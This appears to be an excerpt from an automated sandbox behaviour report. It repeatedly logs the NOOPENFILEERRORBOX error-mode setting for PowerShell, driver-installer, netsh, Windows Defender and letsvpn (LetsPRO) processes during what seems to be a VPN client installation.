                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
